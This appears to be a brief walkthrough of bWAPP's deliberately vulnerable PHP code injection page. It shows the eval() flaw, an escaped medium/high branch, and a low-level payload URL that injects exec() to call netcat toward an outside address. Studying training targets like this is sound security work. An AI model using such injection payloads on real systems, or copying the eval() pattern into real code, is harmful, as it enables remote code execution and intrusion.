bWAPP–PHP Code Injection
?
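<?php
// bWAPP phpi.php (excerpt): reflects the "message" request parameter into the page.
// Line breaks are restored here: in the collapsed paste the `//` comment swallowed
// the security-level `if`, and `<?phpif` is not a valid opening tag.
if (isset($_REQUEST["message"]))
{
    // If the security level is not MEDIUM or HIGH
    // NOTE(review): the level is read from a cookie, which is a client-supplied value;
    // production code should key such a control off server-side state (e.g. the
    // session). How bWAPP validates it elsewhere is not visible in this excerpt.
    if ($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {
?><p><i><?php
        // VULNERABLE (deliberately, this is a training target): request data is
        // concatenated into a string that eval() runs as PHP, so the parameter is
        // treated as code instead of data. The `@` operator additionally silences
        // diagnostics from this call, removing a signal defenders could monitor.
        // Mitigation: never pass request data to eval(); emit it as data, encoded
        // for the HTML context, and alert on eval() over request variables in review.
        @eval ("echo " . $_REQUEST["message"] . ";");
?></i></p>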
-
low
http://127.0.0.1/phpi.php?message=exec("nc 192.168.80.2 4444")
-
mid/high
无法绕过:该分支不调用 eval(),只把参数经 htmlspecialchars() 转义后输出,输入被当作数据而不是 PHP 代码执行。
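<?php
    }
    // If the security level is MEDIUM or HIGH
    else
    {
        // No eval() on this branch: the parameter is only echoed, and
        // htmlspecialchars() with ENT_QUOTES / UTF-8 encodes it for the HTML
        // context, so it is handled as data rather than executed as PHP.
        // (Line breaks restored; the collapsed paste had the `//` comment
        // swallowing `else{`, and a redundant second `;` after the echo.)
?><p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8"); ?></i></p><?php
    }
}
?>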